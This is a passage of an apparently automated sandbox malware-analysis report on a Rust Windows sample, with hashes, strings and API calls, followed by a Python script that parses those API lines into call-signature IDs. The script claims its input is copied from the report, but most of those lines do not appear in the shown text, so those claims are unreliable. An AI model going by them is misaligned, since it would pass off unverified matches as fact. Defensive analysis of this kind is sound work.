                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressWake$Single
                                            • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                            • API String ID: 1135737206-63010627
                                            • Opcode ID: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                            • Instruction ID: 2760b41df263073bba1abd77da33771e3879a8adf998b0218122150e7d717bee
                                            • Opcode Fuzzy Hash: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                            • Instruction Fuzzy Hash: D3913A21E08A4385FB11FF1CE880379A7B0AB76764F854535DB2D823A9DF2DE685D360
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressWake
                                            • String ID: system_info.txtFailed to write to file:
                                            • API String ID: 98804233-2426490079
                                            • Opcode ID: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                            • Instruction ID: cd8617f3eb8b516aee57b099c5a1dd9e0a4ec0af04c9fcba2aebf81fe3db4e6f
                                            • Opcode Fuzzy Hash: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                            • Instruction Fuzzy Hash: 69318132A0860386F721AF19F85036AB6B0FB66314F914535DB9E46794CF7DE586C3A0
                                            Strings
                                            • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF7B902658C
                                            • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7B9026574
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                            • API String ID: 3114109732-122189663
                                            • Opcode ID: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                            • Instruction ID: 0b65b751540e4adafb4074e13b0f657600182f7bd8d8e24948ecb28b223792ac
                                            • Opcode Fuzzy Hash: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                            • Instruction Fuzzy Hash: 48319022F05A1299EB50EF68D8453EC73B0BB61718FA48636CF2C52799EF38D586C310
                                            APIs
                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D00
                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                            • Instruction ID: fb321cf870c2da4a5b4bb4ba53290a868499ac5d8a00154534b0f605223c73d0
                                            • Opcode Fuzzy Hash: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                            • Instruction Fuzzy Hash: DB115B32618B4282EB619F29E480269B7F4FB9AB84F984230DF9D07B59DF3CD551CB00
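The "APIs" entries above all have one fixed line shape: bullet, API name, module, the raw argument column, and a "ref:" call-site address. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code. It parses those lines (the sample input is the report's own API lines, copied inline), groups the calls into per-function sequences ordered by call site, and rebuilds an "API ID"-style text so that sequences can be cross-referenced against other reports. Two things in it are assumptions rather than documented behaviour and are labelled as such in the code: that the non-zero 64-bit values in the argument column are return addresses that identify the calling function, and the word-counting rule used to reconstruct the "API ID" text, which reproduces the three entries on this page whose API lines are visible but is not Joe Sandbox's published algorithm.

```python
import re
from collections import Counter, defaultdict

# Constructed input: the "APIs" bullet lines copied verbatim from the report above.
SAMPLE_APIS = """\
• CancelIo.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031488
• GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314AA
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314BC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031528
• CreateEventW.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B9031100
• GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B903115D
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311CE
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311D4
• RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D00
• RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D41
"""

# One report line: "• <Api>.<MODULE>(<arg,arg,...>), ref: <hex address>"
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text):
    """Turn the report's bullet lines into dicts: api, module, args (list of str), ref (int)."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" / "Strings" are skipped
        records.append({
            "api": m["api"],
            "module": m["module"],
            "args": m["args"].split(","),
            "ref": int(m["ref"], 16),
        })
    return records


def context_key(record):
    """Heuristic (assumption): the argument column is the raw stack at call time, so the
    non-zero full 64-bit values in it are return addresses of the calling frames.
    Calls that share the same set of them were made from the same function."""
    return tuple(sorted({a for a in record["args"] if len(a) == 16 and a != "0" * 16}))


def call_sequences(records):
    """Group calls by caller context; order each group by call-site address (the 'ref')."""
    groups = defaultdict(list)
    for r in records:
        groups[context_key(r)].append(r)
    return {k: [r["api"] for r in sorted(v, key=lambda r: r["ref"])] for k, v in groups.items()}


_DROP = {"Get", "Rtl"}  # accessor/vendor prefixes that carry nothing useful for matching


def api_words(api):
    """Split an API name into CamelCase words, dropping prefixes and tokens of <= 2 chars
    (e.g. 'Io', 'W', 'Pc', 'To'), which is what the page's IDs appear to do."""
    return [w for w in re.findall(r"[A-Z][a-z0-9]*", api) if w not in _DROP and len(w) > 2]


def signature(apis):
    """Reconstruction (assumption) of the report's 'API ID' text: count the words of every
    call, emit each frequency class alphabetically, most frequent class first, classes
    joined by '$'. Reproduces the three visible entries on this page; Joe Sandbox's real
    rule is not published here and may differ (for instance via a stop-word list)."""
    counts = Counter(w for api in apis for w in api_words(api))
    by_freq = defaultdict(list)
    for word, n in counts.items():
        by_freq[n].append(word)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def summarize(text):
    """Per caller context: the ordered call sequence plus its reconstructed API ID."""
    return {
        key: {"sequence": seq, "api_id": signature(seq)}
        for key, seq in call_sequences(parse_api_lines(text)).items()
    }


if __name__ == "__main__":
    for key, info in summarize(SAMPLE_APIS).items():
        print(" ".join(key) or "<no context>", "->", " > ".join(info["sequence"]), "|", info["api_id"])
```

Run against the three visible groups this prints, for example, `00007FF7B9030D5D -> CreateEventW > GetLastError > CloseHandle > CloseHandle | CloseHandle$CreateErrorEventLast`, which matches the report's own "API ID" line for that function. Entries whose API list is empty on the page (such as the WakeByAddress-style IDs) cannot be checked this way, so treat a mismatch there as a limit of the reconstruction rather than of the report.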